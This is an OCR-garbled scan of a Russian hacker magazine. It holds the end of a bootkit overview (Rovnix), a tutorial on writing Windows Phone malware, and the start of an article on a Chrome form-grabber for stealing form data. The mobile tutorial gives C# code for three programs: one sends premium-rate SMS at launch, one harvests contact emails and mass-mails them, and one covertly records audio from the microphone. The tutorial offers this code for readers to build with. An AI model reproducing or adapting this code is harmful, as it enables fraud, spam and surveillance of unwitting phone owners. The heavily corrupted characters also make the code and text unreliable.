СагЬегр получил второе место за технологичность, так как это 






Веселая тройка буткитов 
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Рис. 12. Заражение системы буткитом Роѵпіх 



Рис. 13. Загрузка Роѵпіх 



первый банковский буткит, который эффективно работает как 
в х86-, так и в х64-системах. В 2012 году, я думаю, мы еще не раз 
услышим об этой вредоносной программе. 



ТРЕТЬЕ МЕСТО! БЕЗ ФАНФАР 



Третье почетное место нашего хит-парада занимает Роѵпіх, 
который первым стал использовать модификацию областей за- 
грузочного кода, отличного от МВР. Процесс заражения системы 
проиллюстрирован на рис. 12. 

Как видно из блок-схемы, в процессе заражения, за исключе- 
нием этапа модификации Вооізігар-кода, нет ничего необычного. 
Вооізігар — это часть загрузчика, которая отрабатывается сразу 
после инициализации ѴВР (Ѵоіите Вооі Ресогб), но перед загруз- 
кой системного Ьооітдг. Именно это и позволяет впоследствии 
влиять на загрузку системы. Роѵпіх, как и ОІтазсо, использует 
скрытую файловую систему для хранения своих компонентов и по- 
следующего доступа к ним при помощи буткит-кода, но, в отличие 
от файловой системы ОІтазсо, она устроена довольно примитивно, 
то есть, по сути, представляет собой просто область диска, в кото- 
рую записаны данные, и не имеет какой-либо сложной структуры. 

В принципе, в описываемом случае эта область с данными нужна 
лишь для того, чтобы в процессе работы буткит мог прочитать 
необходимые компоненты и заменить ими оригинальные при за- 
грузке системы. 



Итого, Роѵпіх стал первой угрозой, показавшей неэффектив- 
ность многих антивирусных продуктов, которые проверяли целост- 
ность только МВР. В итоге вектор атаки, используемый буткитами, 
получается практически неисчерпаемым, пока целостность си- 
стемы проверяется на поздних этапах загрузки системы. По сути, 
сейчас система загружается всегда на недоверенной платформе. 
Возможно, технология ЗесигеВооІ исправит эту ситуацию в ѴѴіп8, 
но это будет еще не скоро. 



ЗАКЛЮЧЕНИЕ 



В этом году в нашем хит-параде самых технологичных угроз 
присутствовали вредоносные программы, имеющие различный 
буткит-функционал и содержащие скрытые файловые системы. 
Всё это в первую очередь призвано скрывать вредоносные про- 
граммы от антивирусных продуктов, противодействовать лечению 
активного заражения и затруднять проведение криминалистиче- 
ской экспертизы. В наступившем году проще жить не станет, и я 
думаю, что многие из описанных в этой статье векторов уже себя 
исчерпали и в нашем следующем хит-параде, возможно, появятся 
угрозы, использующие специфические особенности современных 
процессоров, такие как многоядерность и аппаратная виртуализа- 
ция. Но с точки зрения реальных угроз это возможно только в слу- 
чае их рентабельности, поскольку, как показывают мои наблюде- 
ния, кибеприступники — крайне прагматичный народ. ^ 











МАШАІ^Е 



Юрий «уигетЬо» Язев (уаіеѵзоНгадтаіІ.сот) 



Малварь 

ДЛЯ мобильных 

«окошек» 




ІШП 

Чтобы создать 
объект класса 
МесІіаЕІетепІ 
(производным 
от него является 
объект тесІіаЗоипсІ), 
надовХАМІ-код 
добавить такую 
строчку: <МесІіаЕ1е- 
тегѵЬ Неі§ІтЬ="120" 
Мате="шесІіа5оипсІ" 
1лІісІ1:Іі="160" />. 



ИССЛЕДУЕМ МОДЕЛЬ БЕЗОПАСНОСТИ 
ПОПУЛЯРНОЙ ОС ДЛЯ СМАРТФОНОВ 
НА ПРАКТИКЕ 



ІѴІѴІѴІ 

ѵѵіпсІоѵѵарИопеЬаск- 
ег.сот — хороший 
сайт, содержащий 
много интересной 
инфыохакахѴѴР 
7-7.5. 




Вообще-то в нашем журнале работает полно фанатов винды, скажем я 
или наш редактор, доктор Лозовский. К счастью, он очень обижен тем 
фактом, что М5 слишком долго тянула с обновлением его любимой ѴѴМ6.5, 
и поэтому поручил мне хорошенько разобраться, как в новой системе 
обстоят дела с малварью и уязвимостями. Вперед! 



На диске находятся 
три проекта, 
разработка которых 
описана в статье. 





Малварьдля мобильных «окошек» 



□ о недавнего времени в стане ѴѴР было достаточно спокой- 
но, но в середине декабря на платформе ѴѴіпсІоѵѵз РЬопе 7.5 
неожиданно был зафиксирован факт ребута операционной 
системы, в результате которого, после получения специально подго- 
товленного СМС-сообщения ( аоо.аІ/УЫги ), функция отправки и чтения 
эсэмэсок перестает работать. Такого же эффекта можно добиться, от- 
правив особое сообщение из социальной сети (например, из РасеЬоок). 
А сообщение, автор которого имеется в тайле на рабочем столе, может 
заблокировать все функции телефона! Этот баг — не новинка в мире 
мобильных устройств, в свое время им также страдали и айфоны, 
и андроиды. 

Если не брать во внимание последний рассмотренный эпизод, то 
этот баг не так уж и критичен, особенно по сравнению с СМС-атакой 
на айфон, которая позволяет атакующему получить полный контроль 
над устройством. Пользователи андроидов тоже были в опасности: 
«СМС-смерть» выкидывала телефон в офлайн или, что даже хуже, 
предоставляла атакующему полный доступ к системе. 

В настоящее время из «трех китов» только ѴѴР 7 уязвима для 
СМС-атак. Когда писались эти строки (январь 2012-го), обновления, 
устраняющего этот глюк, еще не было. МісгозоН в последнее время 
довольно часто выпускает апдейты для своей мобильной оси, поэтому 
будем надеяться, что исправление последует очень скоро. 



МАЛВАРЬ И ДРУГИЕ ПРЕЛЕСТИ 
ДЛЯ ѴѴІМР0ѴѴ5 РНОМЕ^^И 



Более чем за год существования платформы хакеры успели далеко 
не один раз взломать систему, поэтому мы рассмотрим лишь некото- 
рые из этих хаков, самые выдающиеся и общественно полезные. :) 

Как известно, чтобы разлочить устройство под управлением ѴѴР 7, 
необходимо пройти утомительную процедуру регистрации в ѴѴіпсІоѵѵз 
РЬопе Магкеіріасе и вдобавок заплатить 99 «вечнозеленых президен- 
тов». Однако умельцы из СЬеѵгопТеат изготовили тулзу СЬеѵгопѴѴР7, 
которая разлочивает систему. 

Эта утила тоже не бесплатна, но за нее придется отдать несравни- 
мо меньше — девять «президентов». Она корректно функционировала 
только на ѴѴР 7, а так как Мапдо М5 пофиксила баг в ѴѴР 7.5, который 
использовала программа, то теперь утила от СЬеѵгопТеат не работа- 
ет. В принципе, есть еще один джедайский способ разблокировать 
устройство для запуска сторонних приложений. Для каждого произво- 
дителя он свой, количество действий, необходимых для достижения 
цели, тоже различается. Как говорится, Гугл в помощь! :) 

Пользователь новой мобильной «форточки» не имеет доступа 
к файловой системе смартфона. Подключенное устройство не ото- 
бражается в Эксплорере как дополнительный дисковый накопитель, 
но это легко исправить. Сперва отключи девайс от компьютера для 
чистоты эксперимента, открой редактор реестра, разверни ветвь 
НКЕУ_10СА1_МАСН1МЕ\5У5ТЕМ\Сиггеп1Соп1го15еЛЕпит\и5В,там 
найди строку 2ипе0гіѵег, далее открой ее материнскую ветку Оеѵісе 




Редактируем реестр 

Рагатеіег и уже там измени следующие ключи: БЬоѵѵІпБЬеІІ устано- 
ви в единицу, РогІаЫеОеѵісеМаппеБрасеЕхсІисІеРгоппБЬеІІ — в нуль, 
ЕпаЫеЕедасуБиррогІ — в единицу. 

Использовать ѴѴР 7 как модем без специальных приготовлений 
тоже было нельзя. Но, к счастью, в ѴѴР 7.5 это недоразумение было 
исправлено. Правда, последнее слово всё равно остается за операто- 
ром сотовой связи, и если тариф не предназначен для расшаривания 
интернета, то им придется пользоваться исключительно на мобильном 
девайсе (хе-хе). 



ХАКЕРСКИЕ ИССЛЕДОВАНИЯ 



Перейдем от обзоров чужих хаков к реализации собственной малвари. 
Несмотря на то, что ѴѴР в целом выглядит «неломаемой» системой (что 
довольно странно для М5 ;)), у хакеров, каку Мальчиша-Кибальчиша, 
есть тайные ходы, и их не засыпать. 

Приложения для ѴѴР выполняются под .МЕТ в окружении БіІѵегІідЬТ 
Это значит, что нам ничего не придется писать с нуля и можно будет 
воспользоваться готовым АРІ. Проще всего отправить 5М5 на платный 
номер. Так пускай наше «полезное» приложение делает это сразу 
после запуска! Для того чтобы можно было обрабатывать события 
жизненного цикла приложения, надо подключить следующее про- 
странство имен: 

и5Іп§ 5у5І;ет.1лІіпсІоы5.Маѵі§а1;іоп; 

Кроме того, надо добавить пространство имен МісгозоІ'ТРЬопе. 
Тазкз, чтобы работать с 5М5 и мылом (см. ниже). Затем напишем об- 
работчик события, возникающего при загрузке приложения: 



рго1:ес1:ес1 оѵеггісіе ѵоісі 0пМаѵі^ а1:есІТо(Маѵі§а1:іопЕѵеп1:Аг§5 е) 

{ 

$т5Сотро5еТа5к шз^БМБ = пеѵ\/ БтзСошр оБеТаБкП ; 
т5^$ М$.Вос1у = "Наш е зло-сообщен ие": 



БЕЗОПАСНОСТЬ ѵѵтооѵѵз РНОНЕ 



Посмотрим, что Місгозо^І сделала для безопас- 
ности своей мобильной ОС. 

1. Весь код управляемый (выполняется под 
.МЕТ Сот расі), из чего следует, что (по- 
тенциально) никакое ПО не может нанести 
вред системе. 

2. Каждое приложение выполняется в своем 
пространстве — камере (сИатЬег). 

3. Каждое приложение хранит свои данные 
обособленно от других приложений, таким 
образом, к ним никто не имеет доступ а, 
кроме самого приложения. 



4. Пользователю запрещен доступ к файло- 
вой системе смартфона. (Казалось бы, это 
ограничивает наши возможности, но, если 
задуматься, часто ли тебе приходится 
копаться в содержимом своего телефона? 
К тому же безопасность — прежде всего.) 

5. Приложения можно устанавливатьтолько 
изѴѴіпсІоѵѵз РИопе Магкеіріасе. 

6. Данные передаются через 551. Впрочем, 
было бы странно, если бы было иначе. 

7. Разработчик может использовать класс 
РгоІесІесІОаІа (находящийся в простран- 



стве имен 5у5Іет.5есигіІу.СгурІодгарЬу), 
чтобы легко шифровать данные. 

8. ѴѴР 7 поддерживаетследующие алго- 
ритмы шифрования: АЕ5, НМАС5НА1, 
НМАС5НА256, Рк28980егіѵеВуІе5, Р5А, 
5НА1,5НА256. 

9. Встроенный браузер, мобильный ІЕ, не по- 
зволяет уста на вливать дополнительные 
плагины. 

10. Приложения, разработанные не в МісгозоН, 
не могут функционировать в фоновом 
режиме. 
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тз^ЗМЗ.То = "1928": 

тз^ЗМЗ.БІіоыП ; 

} 

Последняя команда листинга формирует и отправляет сообщение; 
остальной код в комментариях не нуждается. 



МОБИЛЬНЫЙ СПАМ — ЗЛОБОДНЕВНАЯ ТЕМА :) 



Следующая прога, которую мы напишем, будет считывать имейлы 
из списка контактов владельца смартфона и рассылать на них «цен- 
ную» информацию :). В отличие от предыдущей версии мобильной 
оси, в ѴѴР 7.5 контактные данные хранятся в удобочитаемом виде 
в локальной БД. К ним относятся не только номера телефонов 
и адреса электронной почты, но и другая информация о контактах, 
забитая пользователем, так что за ним можно будет еще и по- 
шпионить. Эта БД предназначена только для чтения, поэтому тебе 
не удастся модифицировать данные или добавить новый контакт. 

Пора начинать разработку. Создай новый ѴѴР-проект (обрати 
внимание, что операционная система имеет версию 7.5, а БОК — 
версию 7.1) на основе БіІѵегІідЬС перейди в файл С#-кода и добавь 
в начало ссылку на пространство имен МісгозоН.РЬопе.СІзегОаІа, 
обеспечивающее работу с пользовательскими данными. Не забудь 
также добавить указанное в прошлом разделе пространство имен 
для работы с мылом. Второе, что надо сделать, — это объявить 
глобальную переменную класса Сопіасіз, чтобы иметь доступ 
к контактным данным юзера. Для инициализации поиска мы вы- 
зываем из функции МаіпРаде функцию ІпііБеагсЬ, которая в строчке 
сопІасІз.БеагсЬАзупсІБігіпд.ЕппрІу, РіКегКіпсІ.ОізрІауМаппе, пиІІ) 
производит асинхронный поиск по контактным данным. У функции 
БеагсЬАзупс три параметра: условие поиска (если этот параметр 
пустой, то ищется всё); параметр, по которому проводится выбор- 
ка (можно искать по имени, имейлу, номеру телефону или просто 
указать Мопе, если параметр не важен, как в нашем случае); объект, 
в который помещается результат поиска, или пиІІ. Результат всё рав- 




Интерфейс 0ѵегЬеаг2 



СПОСОБЫ ХРАНЕНИЯ 



ѴѴіпсІоѵѵз РИопе предоставляет приложениям три способа 
раздельного хранения информации: 

1. Изолированное хранилище для настроекзапоминаеттекущее 
состояние приложения при переходе из одного режима его работы 
вдругой (используется ИазИ-таблица: параметр = значение). 

2. Изолированное хранилище для файлов и папок. 

3. Локальная БДдля реляционныхданныхслужитдляхране- 
ния множества строго упорядоченных свойств приложения, 

к которым впоследствии можно обратиться с помощью запроса 
на им О, чтобы изъять и/или модифицировать да иные. 

Таким образом, у разработчика имеется широкий ассортимент 
средств для хранения данных, несмотря на отсутствие доступа 
к файловой системе устройства. 



но будет возвращен в переменной класса СопІасІзБеагсЬЕѵепіАгдз., 
но вернется он только в событии БеагсЬСотрІеІесІ, обработчик 
которого надо зарегистрировать в функции МаіпРаде: 

соп1;ас1;5 . 5еагсІіСотр1е1:есІ += пей/ Еѵеп1;НапсІ1ег< 

Соп1:ас1:55еагсІіЕѵеп1:А г^5>(соп1:ас 1:5_$еагсІіСопір1е1:есП 

Теперь опишем это событие: 

ѵоісі соп1іа с1:5_$еагсІіСопір1е1:ес І(оЬдес1: зе псіег. 
Соп1іас1:з$ еагсІіЕѵеп'^:Аг^5 е) 

і 

ІПІ: шах = е .КезиІІіз.СоипІіО : //кол-во контактов 

зіігіп^ асіг: 

ІІГѴ { //во избежание падения проги 

-Рог (ІПІ: і = 0: і < шах: і++) 

і-р (е.Кези11і5.Е 1епіеп1:А1:(і^ . ЕтаіІ АсІсІгез зез != пиІІ) 

{ 

асІг = е.Кези11:5. Е1епіеп1:А1:(і') . 

ЕтаіІАсІсІгеззез. Ріг5І;() .ЕшаіІАсІсІгезз; //берем мыло 

і-р (асіг != пиІІ && асіг != // если оно не равно нулю 

БепсІЕтаіКасІг) ; //шлем мыло :) 

— } 

саісРі (Ехсер-ріоп ех) I > 

} 

Из кода видно, что вначале мы берем общее количество найденных 
контактов, затем в цикле выбираем первый е-таіі-адрес каждого кон- 
такта (у него может быть не одно мыло) и, если этот адрес не пустой, 
вызываем функцию БепсІЕппаіІ, которой передаем найденный адрес. 
Это очень простая функция: 

ѴОІСІ $епсІЕтаі1($1:гіп^ асіг) 

{ 

ЕтаіІСот розеТазк етаіі ЕтаіІСотрозеТазкО ; 

етаіІ.То = асіг; 

етаіі. БиЬдесІ: = "Ноіу таіі";^ 

етаіі. Восіу = "Ооыпіоасі ту рго§"; 

етаіІ.БІіоыП ; 

} 

Как всегда, подробно прокомментированный листинг ищи на диске 
(проект ЕтаіІБепсІег). 
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Малварьдля мобильных «окошек» 



ПОДСЛУШИВАТЕЛЬ 



В прошлом разделе у нас с тобой был легкий расслабон, поэтому 
давай напишем что-нибудь посложнее и поинтереснее. Как следует 
из заголовка раздела, следующая наша малварь будет слушать и со- 
хранять все улавливаемые смартфоном звуки. Для ясности вкратце 
расскажу об алгоритме ее работы, как я его вижу. Разумеется, мы 
пишем этот пример исключительно в исследовательских целях! ;) 
После запуска наше приложение на несколько секунд включает 
микрофон и записывает окружающие звуки в поток, затем выключа- 
ет микрофон и записывает поток в файл в изолированном хранили- 
ще смартфона, после чего, наконец, загружает из этого хранилища 
файл и воспроизводит его. Результат мы узнаём только после 
исполнения последовательности всех этих действий, поэтому кроме 
малвари я приготовил для тебя приложение (0ѵегЬеаг2, ищи на дис- 
ке), в котором каждая отдельная операция выполняется по нажатию 
кнопки, чтобы ты мог подробней исследовать все эти операции. 

Если хочешь создать проект вместе со мной с нуля, сгенерируй 
новый ЗіІѵегІідЫ- проект для ѴѴР. Перейди в начало файла С#-кода 
и подключи следующие пространства имен: 

изіпе $Ѵ5І:етЛ0: 

Ц5ІП| МісгоБО-Ріі.Хпа.Ргатеыогк; 

МісгоБО-Ріі.Хпа. Ргашеыогк.АисІіо; 

Ц5іп^ 5ѵ5І:ет.1лІіпсІоы5.ТІігеасІіп^: 

Ц5іп^ 5ѵ5І:етЛОЛ50Іа1:есІ51:ога^е: 

В первом из них находятся классы для работы с потоками и фай- 
лами, во втором — РгаппеѵѵогкОізракЬег (если коротко, обработ- 
чик циклических событий), в третьем, собственно, сам микрофон, 
в четвертом — таймер для генерации циклических событий (ниже 
рассмотрим, для чего он нужен), а в пятом — средства для работы 
с изолированным хранилищем. Далее в автоматически сгенери- 
рованном классе МаіпРаде объявим глобальные переменные (см. 
исходник). Первая не представляет особого интереса, в ней просто 
содержится имя файла для сохранения полученного звука и его по- 
следующего считывания. Во второй переменной объявляем микро- 
фон, которому сразу же присваиваем значение «по умолчанию» — 
в настоящее время все смартфоны с ОС ѴѴіпсІоѵѵз РЬопе оснащаются 
только одним микрофоном, поэтому выбор невелик :). 

Затем объявляем переменную, к которой привязывается по- 
ток. В этом потоке сохраняются аудиоданные в течение сеанса 
записи, перед сбросом в хранилище. Массив байтов (следующая 
переменная) используется для промежуточного хранения данных. 
Когда внутренний буфер микрофона заполняется, данные из него 
скидываются в этот массив, и только затем записываются в по- 
ток. Булевская переменная гесогсІіпдЗіорресІ указывает действие, 
выполняемое в данный момент, то есть, если она равна нулю, идет 
запись (если микрофон еще включен), в противном случае осущест- 
вляется воспроизведение. 

В конструкторе класса объявим два таймера класса 
ОізракЬегТітег плюс инициализируем их временные значения. 
Первый таймер нужен для имитации игрового цикла хпа. Так как 



микрофон относится к пространству имен хпа, он управляется со- 
бытийным механизмом этого цикла: 

ОізраІісІіегТітег сП: = 0ізра1:сІіегТітег(); 

сПіЛпІіегѵаІ = ТішеБрап. РготМі11ізесопсІ5(ЗЗѴ. 

Чтобы иметь возможность обрабатывать событие таймера, про- 
исходящее через заданный промежуток времени, подписываемся 
на событие: сІІі.Тіск += пем Еѵеп'1;НапсІ1еп(сІ'к:_Тіск). Затем с помощью 
команды сІТЗіагіО запускаем таймер. 

Второй таймер нужен для того, чтобы выключить микрофон, 
сохранить поток в файле и воспроизвести его. Таким образом, для 
инициализации временного интервала таймера нужен длительный 
промежуток (например, 10 000 мс), плюс надо задать другую функцию 
в качестве обработчика события, всё остальное то же самое. В конце 
конструктора инициализируем микрофон, вызывая самописную 
функцию ЗеШрМісгорЬопе. Сначала она проверяет, чтобы дефолтный 
микрофон не был равен нулю. Если это по каким-то причинам не так, 
то, делать нечего, выходим. 

Затем устанавливаем аудиобуфер микрофона, чтобы получить 
возможность записывать аудио продолжительностью полсекунды. 
Заполняем нулями объявленный ранее поток. После этого регистри- 
руем событие, возникающее при заполнении буфера. Вызов функ- 
ции ѴѴгПеѴѴаѵНеасІег рассмотрим несколько позже, пока он для нас 
не слишком важен. Наконец, с помощью строчки ппісгорЬопе.ЗіагіО 
включаем микрофон на запись окружающих звуков. В последней 
строчке функции устанавливаем уровень громкости. 

Настала очередь события первого таймера, которое вызывается 
каждые 33 миллисекунды. В нем только обновляется состояние, 
при этом все происходящие исключения игнорируются. С момен- 
та запуска программы и до тех пор, пока идет запись, переменная 
гесогсІіпдЗіорресІ имеет нулевое значение. Когда истечет временной 
интервал второго таймера и его событие будет сгенерировано, эта 
переменная примет истинное значение. При заполнении аудиобуфера 
микрофона (это происходит примерно каждые 500 миллисекунд) вы- 
зывается событие тісгорЬопе_Ви^^егРеасІу. 

В нем данные извлекаются из аудиобуфера микрофона и записы- 
ваются в поток. Если при этом переменная гесогсІіпдЗіорресІ принима- 
ет истинное значение, значит, запись завершена, и нам необходимо 
выключить микрофон и сохранить поток данных в файле. 

Возможно, ты задался вопросом: почему мы не выключаем микро- 
фон непосредственно при генерации события второго таймера, а от- 
кладываем отключение до следующего заполнения буфера данных? 
Это нужно для того, чтобы данные, имеющиеся в буфере к моменту 
возбуждения события тика таймера, были сохранены. Если бы мы 
сразу выключили микрофон, то данные, находящиеся в его буфере, 
были бы уничтожены. 

Функция ЗаѵеРіІеО (см. листинг), вызываемая для сохранения фай- 
ла, просто создает файл в изолированном хранилище и записывает 
в него весь поток с начала и до конца. 

ргіѵаііе ѵоісі Б аѵеРіІеП { //сохранить файл 



ЖИЗНЕННЫЙ ЦИКЛ ПРИЛОЖЕНИЯ 



В любой промежуток времени может выполняться 
одно приложение, и это очень важно — факт в том, 
что это приложение (теоретически) не сможет 
в фоне отправить эсэмэску на платный номер или 
совершить другие злодеяния. Этотход позволяет 
достигать наилучшей производительности, и 
не тратить заряд батареи на фоновые задачи. Когда 
пользователь переключается с одного приложения 



на другое, первое переводится в спящий режим 
(сіогтапі), но его текущее состояние сохраняется, 
чтобы при последующем запуске приложение 
возобновило работу. Процесс захоронения 
приложений (асііѵе -> сіогтапі) получил название 
ІотЬзІопіпд. Если работающему приложению 
не хватает ресурсов, то ОС завершает (іегтіпаіе) 
спящие приложения в порядке их запуска. В общем. 



в течение жизненного цикла приложения с ним 
происходит от двух до четырех событий: событие 
ЕаипсЫпд в моментзапуска, СІозіпд в момент 
закрытия, Оеасііѵаііпд при деактивации (при 
захоронении) и Асііѵаііпд при восстановлении 
из ІотЬзІопе. Все эти события, в которых обычно 
производится сохранение и восстановление 
состояния приложений, можно обрабатывать. 
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Ц5іп^ ( І501а1:есІ51:ога^еРі1е І5о51;ога§е = 

І501а1;есІ51;ога§еРі1е.ее1;и5ег51;огеРогАрр1іса1;іоп()){ 

(І501а1;есІ51:ога§еРі1е51;геат І5о51;геат = 

І5о51;ога§е . Сгеа1:еРі1е( РіІеМате) ) { 

І5о51:геапі.1лІгі1:е(5І:геат.ТоАггауП . 0. 

5І;геат.ТоАггау() .Іеп§1;Іі); 

} 

} 

} 

Однако если сохранить поток в таком виде, в каком он сейчас есть, 
то его не откроет ни одна программа для воспроизведения. Чтобы 
привести сырой поток данных к понятному виду, необходимо добавить 
заголовок. Таким образом, у нас получится ѵѵаѵ-файл. Если нужно 
получить файл другого типа, то над потоком данных нужно дополни- 
тельно поизвращаться :). Но и чтобы получить простой ѵѵаѵ-файл, нам 
необходимо знать формат полей заголовка. В своем блоге швейцар- 
ский программист Дамиан ( аоо.аІ/и^еЗѵ ) предлагает замечательное 
решение, которое заключается в добавлении двух функций (их код 
есть на странице). Не вижу смысла им не воспользоваться! 

Функцию ѴѴгіІеѴѴаѵНеасІег, которая создает начальные данные для 
заголовка, надо вызвать в начале записи (в нашем случае — в функ- 
ции ЗеШрМісгорЬопе), а функцию ІІрсІаІеѴѴаѵНеасІег, обновляющую 
заголовочные данные, которые зависят от размера записываемого 
потока, — в конце записи, перед сбросом данных в файл (то есть 
в функции тісгорЬопе_Ви1'І'егРеасІу, после окончания записи, но перед 
вызовом ВаѵеРіІе). В результате в изолированном хранилище будет 
сохранен полноценный ѵѵаѵ-файл. Последнее действие, выполняемое 
в обработчике события тісгорЬопе_Ви1'1'егРеасІу (кроме обнуления 
переменной гесогсІіпдЗіорресІ), — это вызов функции РІауРіІе для 
воспроизведения звука из сохраненного файла. Вот как выглядит эта 
функция: 

ргіѵаііе ѵоісі РІаѵ РіІеП { //во спроизвести сохраненный файл 

изіп^ (ѵаг із-Р = 

І50І а1:есІ$1:ога^еРі1е . беІіЦзегБІіо геРогАррІісаІііопП’) I 

і-р (І5-Р.Рі1еЕхІ5Іі5(Рі1еМате)) { 

Ц5іп§ (ѵаг І5о51;геат = І5-Р.0репРі1 е( РіІеМате. 

РіІеМосІе.Ореп^ РіІеАссез з.КеасП) I 

тесІі аЗоипсІ , 51; ор ( ) ; 

тесІ іаЗоипсІ . 5е1;5оигсе( ізоБігеат) 

тесІіаБоипсІ . Ро5І1;іоп=5у5І;ет . Т ітеЗрап . Ргот5есопсІ5 (0) ; 

тесІіаЗоипсІ.ѴоІите = 20; 

тесІіаЗоипсІ.РІауП ; 

} 

} 

} 

} 




Разработка малвари ОѵегЬеаг 



При использовании объекта изолированного хранилища он откры- 
вается для чтения только после проверки того, существует ли вообще 
файл указанного имени. Звук из открытого файла воспроизводится 
с помощью объекта тесІіаЗоипсІ. Воспроизведение начинается после 
привязки файлового потока к данному объекту и установки позиции, 
с которой надо начать проигрывание, и громкости звучания. 

Кроме того, можно воспроизводить поток аудиоданных прямо 
из памяти. Для этого достаточно создать объект звукового эффекта 
со следующими параметрами: звуковой поток в памяти, преобразован- 
ный в массив байтов, частота звука (есть предопределенные значения) 
и количество каналов звуковых данных (моно или стерео). Затем не- 
обходимо вызвать метод РІау данного объекта: 

БоипсІ = пеы 5оипсІЕ-р-Рес1:(5І:геат.ТоАггауП . 

тісгорІіопе.5атр1еКа1:е. АисІіоСІіаппеІБ .Мопо) ; 

БоипсІ.РІауО : 

Вот и все возможности нашей малвари! Тем не менее, имеются пла- 
ны по ее развитию: к примеру, поскольку из ОС ѴѴіпсІоѵѵз РЬопе нельзя 
отправлять письма с вложениями, придется заливать файлы на какой- 
нибудь сервер. Но этим мы займемся в будущем! 



ЗАКЛЮЧЕНИЕ 



В статье мы провели обзор системы безопасности ѴѴіпсІоѵѵз РЬопе 7.5, 
рассмотрели возможные хаки и разработали собственную малварь. 

ѴѴР — широко известная система, и в будущем она будет только 
набирать аудиторию. Так как система имеет мощные средства для обе- 
спечения безопасности, а приложения в ней устанавливаются только 
из Магкеіріасе НиЬ (где подлежат обязательной модерации), у малвари 
практически нет возможности попасть на телефон. В то же время раз- 
витие малвари не стоит на месте, поэтому будем пристально следить 
за дальнейшими событиями, а может быть, и примем в них участие! ^ 



ВЫПОЛНЕНИЕ ПРИЛОЖЕНИЙ 



ѴѴР 7 предоставляет выполняемо му приложе- 
нию изолированное пространство — камеру. 
Приложение, находящееся в этой камере, 
не имеет доступа к данным других приложе- 
ний. При этом существует четыре типа камер: 

1. ТЬеТгизІесІ Сотриііпд Вазе (ТСВ) — база 
доверенного выполнения. На этом уровне 
выполнения приложение с наивысшими 
привилегиями имеет доступ ко всем ресур- 
сам смартфона, включая фото - и видео- 
камеру, акселерометр и другие датчики. 

В этом режиме выполняется ядро системы 



и драйверы уровня ядра, следовательно, 
разработчики прикладных программ долж- 
ны избегать использования этого режима, 
особенно если они хотят разместить свое 
приложение на ѴѴіпсІоѵѵз РИопе Магкеіріасе, 
поскольку выполняющееся на этом уровне 
приложение не пройдет проверку. 

2. ТЬе Еіеѵаіесі РідЫз СЬатЬег (ЕРС) — каме- 
ра повышенных прав. Здесь приложения 
имеют доступ ко всем ресурсам, кроме 
стратегий безопасности, то есть к данным, 
устройствам и датчикам. В этом режиме 



выполняются драйвера пользовательского 
уровня. 

3. ТЬеБіапсІагсІ РідЫзСЬатЬег(5РС) — 
дефолтный режим выполнения предуста- 
новленныхпрограмм,такихкакМ5 ОНісе 
МоЬіІе, Іпіегпеі Ехріогег? ит. д. 

4. ТЬе Іеазі РгіѵіІедесІ СЬатЬег (ІРС) — уро- 
вень наименьших привилегий, дефолт- 
ный режим выполнения приложений 

не от МІСГ 050 ІІ. В этой камере приложению 
предоставляются только те ресурсы, кото- 
рые запрашиваются при инсталляции. 
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Ф0РМГРАББЕРДЛЯ60061ЕСНК0МЕ 

Перехватформ — это наиболее востре- 
бованная технология в троянах, так как 
именно с ее помощью осуществляется 
кража большей части личных данных 
пользователей.Формграббером для 
Іпіегпеі Ехріогеги МогіІІа Ріге^охуже 
никого не удивишь — такие решения 
стары и общеизвестны. А вот граббинг 
для боодіе СЬготе — это своего рода 
эксклюзив, с которым ты сможешь разо- 
браться, прочитав эту статью. Дело-то, 
какоказывается, нехитрое — нужно 
лишь найти функцию, которая в качестве 
одного из параметров принимаетданные 
формы в незашифрованном виден по- 
ставитьна неехук. 




КОДИНГ 



иміхот 
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и ЦЕЛОГО СИ МАЛО 

При разработке хакерских утилит часто 
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ФЕДОРИНО СЧАСТЬЕ 

Последние версии дистрибутива Ресіога 


110 




встречаются задачи, которые нереально 




выделяются несколькими интересными и 





решить силами обычного препроцессора даже инновационными изменениями. Но 

Си. В такой ситуации выручит РуШоп! насколько они хороши? 



ДОСТУЧАТЬСЯ ДО НЕБЕС 

Расширияем границы соприкосновения 
веба иобычного Ыпих-десктопа, 
объединяя привычнуюсистемуи 
облачныесервисы. 



5УНХАСК 



РЕЯяим 
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в ПОИСКЕ ИНСАЙДЕРА 

Выявить и предотвратить утечку кон- 
фиденциальной информацииспособы 
ОІР-системы. Мы решили провести не- 
большой тест-драйв таких решений. 



124 



ИСПЫТАНИЕ НАГРУЗКОЙ 

Какие инструменты и подходы могут 
помочь О]апдо-приложению выдержать 
баснословные нагрузки?0тветна во- 
прос — вэтом материале. 



130 



0Т«ВИНТА^^! 

Гоняем шестьвнешнихжесткихдисков 
в разныхбенчмарках. Пора опреде- 
лить, кто из нихможетпохвастаться 
максимальным быстродействием. 
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Сергей Сергеев (зеБегедайдтаіІ.ги, ЫоІІоге.ЫодзроІ.сот) 




ФОРМГРАББЕР 

для боодіе СЬготе 




ИССЛЕДУЕМ ОТПРАВКУ 
ЗАШИФРОВАННЫХ 
ФОРМ И СПОСОБ ИХ 
ПЕРЕХВАТА В БРАУЗЕРЕ 
ОТ С006СЕ 



УШИ 



» доо.сіІ/СІ4РІ — 
плагин ОІІуОЬд для 
создания сигнатур 
и масок. 

• доо.оІ/гсІАТо — то 
же самое, только 
для ША. 

• доо.дІ/иІдМЬ 
— интересная 
ветка на форуме, 
посвящённая 
перехвату форм 
в СЬготе. 

• доо.дІ/52ѴѴѵѵ2 — 

о прологе и эпилоге. 
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Перехват форм — это наиболее востребованная 
технология в банковских троянах, так как именно с ее 
помощью осуществляется кража большей части личных 
данных пользователей. Формграббером для Іпіегпеі 
Ехріогег и Мо2ІІІа Ріге^ох уже никого не удивишь — такие 
решения стары и общеизвестны. А вот граббинг для 
боодіе Сбготе — это пока эксклюзив, с которым мы 
сегодня и разберемся. 



ІШЛ 

Для генерации 
прологов и эпилогов 
я использовал 
функцию без 
модификатора 

сІесІ5рес(пакесІ), 

рассматривал её 
в дизассемблере 
и копировал начало 
и конец. 



Формграббер для Зоодіе СЬготе 





Рис. 1. Сигнатурный поиск в ОІІуОЬд 



Рис. 2. Поиск 551-запроса 



н 



ичего сложного в перехвате нет, нужно лишь найти функ- 
цию, которая в качестве одного из параметров принимает 
данные формы в незашифрованном виде и поставить 
на нее хук. В ІЕ такая функция, НирВепсІРедиезІ, экспортируется 
библиотекой ѵѵіпіпеЕсІІІ, в Ріге1"ох это функция РР_ѴѴгіІе из библи- 
отеки П5рг4.с111, а как я искал аналогичную функцию для Хрома, 
сейчас расскажу. 



ИССЛЕДОВАНИЕ 

С перехватом незашифрованных форм в боодіе СЬготе нет ника- 
